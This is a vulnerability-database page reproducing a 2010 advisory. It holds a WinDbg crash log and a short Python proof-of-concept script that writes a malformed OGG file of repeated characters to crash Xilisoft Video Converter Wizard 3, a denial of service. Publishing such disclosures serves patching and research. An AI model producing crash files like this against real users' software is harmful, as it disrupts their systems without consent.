Vulners
Lucene search
Xilisoft Video Converter Wizard 3 OGG Denial Of Service
🗓️ 17 Aug 2010 00:00:00Reported by Praveen DarshanamType 
packetstorm🔗 packetstormsecurity.com👁 17 Views
`ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> g
(26c8.1818): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06
00000000 00000000 00000000 00000000 00000000 avformat!nut_init+0x42a
0:000> d eip
0036a9ba 8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9ca 8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036a9da 90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00 .......D$.3.3...
0036a9ea 8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9fa 8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036aa0a 90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57 ......V.t$...tTW
0036aa1a b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00 .Z...3.....h.@..
0036aa2a c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00 [email protected]...
################PoC Start##############################################
print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"
#Download from
# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1
#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
buff = "D" * 8400
try:
oggfile = open("XilVC_ogg_crash.ogg","w")
oggfile.write(buff)
oggfile.close()
print "[+]Successfully created ogg file\n"
print "[+]Coded by Praveen Darshanam\n"
except:
print "[+]Cannot create File\n"
################PoC End################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2010 00:00Current
0.3Low risk
Vulners AI Score0.3